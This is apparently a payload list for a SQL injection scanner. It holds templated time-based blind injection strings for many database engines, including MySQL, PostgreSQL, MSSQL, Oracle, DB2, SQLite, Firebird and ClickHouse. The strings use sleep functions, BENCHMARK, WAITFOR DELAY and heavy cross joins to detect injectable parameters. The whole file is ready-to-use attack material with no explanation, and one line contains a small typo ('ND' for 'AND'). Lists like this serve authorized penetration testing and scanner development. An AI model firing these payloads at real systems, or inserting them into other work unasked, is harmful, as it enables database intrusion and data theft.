{WHERE1} AND (SELECT {RANDNUM} FROM (SELECT(SLEEP({SLEEPTIME}))){RANDSTR})
{WHERE1} OR (SELECT {RANDNUM} FROM (SELECT(SLEEP({SLEEPTIME}))){RANDSTR})
{WHERE1} AND SLEEP({SLEEPTIME})
{WHERE1} OR SLEEP({SLEEPTIME})
{WHERE1} AND SLEEP({SLEEPTIME})--
{WHERE1} OR SLEEP({SLEEPTIME})--
{WHERE1} OR (SELECT {RANDNUM} FROM (SELECT(SLEEP({SLEEPTIME}))){RANDSTR})#
{WHERE1} AND (SELECT {RANDNUM} FROM (SELECT(SLEEP({SLEEPTIME}))){RANDSTR})#
{WHERE1} AND {RANDNUM}=BENCHMARK({SLEEPTIME}000000,MD5('{RANDSTR}'))
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
{WHERE1} OR {RANDNUM}=BENCHMARK({SLEEPTIME}000000,MD5('{RANDSTR}'))
{WHERE1} AND {RANDNUM}=BENCHMARK({SLEEPTIME}000000,MD5('{RANDSTR}'))#
{WHERE1} ND {RANDNUM}=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)#
{WHERE1} OR {RANDNUM}=BENCHMARK({SLEEPTIME}000000,MD5('{RANDSTR}')) #
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)#
{WHERE1} RLIKE SLEEP({SLEEPTIME})
{WHERE1} RLIKE SLEEP({SLEEPTIME})#
{WHERE1} RLIKE (SELECT {RANDNUM} FROM (SELECT(SLEEP({SLEEPTIME}))){RANDSTR})#
{WHERE1} RLIKE (SELECT {RANDNUM} FROM (SELECT(SLEEP({SLEEPTIME}))){RANDSTR})
{WHERE1} AND ELT({RANDNUM}={RANDNUM},SLEEP({SLEEPTIME}))
{WHERE1} AND ELT({RANDNUM}={RANDNUM},SLEEP({SLEEPTIME}))#
{WHERE1} OR ELT({RANDNUM}={RANDNUM},SLEEP({SLEEPTIME}))
{WHERE1} AND {RANDNUM}=(SELECT {RANDNUM} FROM PG_SLEEP({SLEEPTIME}))
{WHERE1} OR ELT({RANDNUM}={RANDNUM},SLEEP({SLEEPTIME}))#
{WHERE1} AND {RANDNUM}=(SELECT {RANDNUM} FROM PG_SLEEP({SLEEPTIME}))#
{WHERE1} OR {RANDNUM}=(SELECT {RANDNUM} FROM PG_SLEEP({SLEEPTIME}))
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM GENERATE_SERIES(1,{SLEEPTIME}000000))
{WHERE1} OR {RANDNUM}=(SELECT {RANDNUM} FROM PG_SLEEP({SLEEPTIME}))--
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM GENERATE_SERIES(1,{SLEEPTIME}000000))--
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM GENERATE_SERIES(1,{SLEEPTIME}000000))#
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM GENERATE_SERIES(1,{SLEEPTIME}000000))
{WHERE1} WAITFOR DELAY '0:0:{SLEEPTIME}'--
{WHERE1} WAITFOR DELAY '0:0:{SLEEPTIME}'
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
{WHERE1} AND {RANDNUM}=DBMS_PIPE.RECEIVE_MESSAGE('{RANDSTR}',{SLEEPTIME})
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
{WHERE1} AND {RANDNUM}=DBMS_PIPE.RECEIVE_MESSAGE('{RANDSTR}',{SLEEPTIME})--
{WHERE1} OR {RANDNUM}=DBMS_PIPE.RECEIVE_MESSAGE('{RANDSTR}',{SLEEPTIME})--
{WHERE1} OR {RANDNUM}=DBMS_PIPE.RECEIVE_MESSAGE('{RANDSTR}',{SLEEPTIME})
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) --
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) --
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)--
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
{WHERE1} OR {RANDNUM}=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB({SLEEPTIME}00000000/2))))
{WHERE1} AND {RANDNUM}=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB({SLEEPTIME}00000000/2))))--
{WHERE1} AND {RANDNUM}=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB({SLEEPTIME}00000000/2))))
{WHERE1} OR {RANDNUM}=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB({SLEEPTIME}00000000/2))))--
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)--
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)--
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)--
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)--
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
{WHERE1} AND '{RANDSTR}'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR({RANDNUM}),0),{SLEEPTIME}000000000),NULL)--
{WHERE1} AND '{RANDSTR}'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR({RANDNUM}),0),{SLEEPTIME}000000000),NULL)
{WHERE1} OR '{RANDSTR}'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR({RANDNUM}),0),{SLEEPTIME}000000000),NULL)
{WHERE1} OR '{RANDSTR}'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR({RANDNUM}),0),{SLEEPTIME}000000000),NULL)--
{WHERE1} AND '{RANDSTR}'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),{SLEEPTIME}00000000),NULL)--
{WHERE1} AND '{RANDSTR}'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),{SLEEPTIME}00000000),NULL)
{WHERE1} OR '{RANDSTR}'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),{SLEEPTIME}00000000),NULL)--
{WHERE1} OR '{RANDSTR}'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),{SLEEPTIME}00000000),NULL)
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)--
{WHERE1} AND {RANDNUM}=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)--
{WHERE1} OR {RANDNUM}=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)
{WHERE1} AND {RANDNUM}=(SELECT COUNT(fuzzBits('{RANDSTR}', 0.001)) FROM numbers(1000000))
{WHERE1} PROCEDURE ANALYSE(EXTRACTVALUE({RANDNUM},CONCAT('\',(BENCHMARK({SLEEPTIME}000000,MD5('{RANDSTR}'))))),1)
{WHERE1} OR {RANDNUM}=(SELECT COUNT(fuzzBits('{RANDSTR}', 0.001)) FROM numbers(1000000))
{WHERE1} PROCEDURE ANALYSE(EXTRACTVALUE({RANDNUM},CONCAT('\',(BENCHMARK({SLEEPTIME}000000,MD5('{RANDSTR}'))))),1)#
{WHERE3} (CASE WHEN ({RANDNUM}={RANDNUM}) THEN SLEEP({SLEEPTIME}) ELSE {RANDNUM} END)
{WHERE3} (SELECT {RANDNUM} FROM (SELECT(SLEEP({SLEEPTIME}))){RANDSTR})
{WHERE3} (CASE WHEN ({RANDNUM}={RANDNUM}) THEN (SELECT BENCHMARK({SLEEPTIME}000000,MD5('{RANDSTR}'))) ELSE {RANDNUM})
{WHERE3} (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
{WHERE3} ({RANDNUM}={RANDNUM} AND SLEEP({SLEEPTIME}))
{WHERE3} MAKE_SET({RANDNUM}={RANDNUM},SLEEP({SLEEPTIME}))
{WHERE3} ELT({RANDNUM}={RANDNUM},SLEEP({SLEEPTIME}))
{WHERE3} (SELECT {RANDNUM} FROM PG_SLEEP({SLEEPTIME}))
{WHERE3} (SELECT COUNT(*) FROM GENERATE_SERIES(1,{SLEEPTIME}000000))
{WHERE3} (SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE {RANDNUM} END))
{WHERE3} BEGIN IF ({RANDNUM}={RANDNUM}) THEN DBMS_LOCK.SLEEP({SLEEPTIME}); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
{WHERE3} (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB({SLEEPTIME}00000000/2)))))
{WHERE3} (SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE {RANDNUM} END) FROM DUAL)
{WHERE3} (SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN DBMS_PIPE.RECEIVE_MESSAGE('{RANDSTR}',{SLEEPTIME}) ELSE {RANDNUM} END) FROM DUAL)
{WHERE3} (SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
{WHERE3} (SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
{WHERE3} (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
{WHERE3} (SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR({RANDNUM}),0),{SLEEPTIME}00000000),NULL) ELSE '{RANDSTR}' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
{WHERE3} (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)
{WHERE3} (SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),{SLEEPTIME}00000000),NULL) ELSE '{RANDSTR}' END) FROM (VALUES(0)))
{WHERE1} ,(SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN SLEEP({SLEEPTIME}) ELSE {RANDNUM} END))
{WHERE1} ,(SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN (SELECT BENCHMARK({SLEEPTIME}000000,MD5('{RANDSTR}'))) ELSE {RANDNUM}*(SELECT {RANDNUM} FROM mysql.db) END))
{WHERE1} ,(SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN (SELECT {RANDNUM} FROM PG_SLEEP({SLEEPTIME})) ELSE 1/(SELECT 0) END))
{WHERE1} ,(SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE {RANDNUM}*(SELECT {RANDNUM} UNION ALL SELECT {RANDNUM1}) END))
{WHERE1} ,(SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,{SLEEPTIME}000000)) ELSE 1/(SELECT 0) END))
{WHERE1} ,(BEGIN IF ({RANDNUM}={RANDNUM}) THEN DBMS_LOCK.SLEEP({SLEEPTIME}); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
{WHERE1} ,(SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN DBMS_PIPE.RECEIVE_MESSAGE('{RANDSTR}',{SLEEPTIME}) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
{WHERE1} ,(SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
{WHERE1} ,(SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR({RANDNUM}),0),{SLEEPTIME}00000000),NULL))) ELSE {RANDNUM}/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)--
{WHERE1} ,(SELECT (CASE WHEN ({RANDNUM}={RANDNUM}) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),{SLEEPTIME}00000000),NULL))) ELSE {RANDNUM}/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
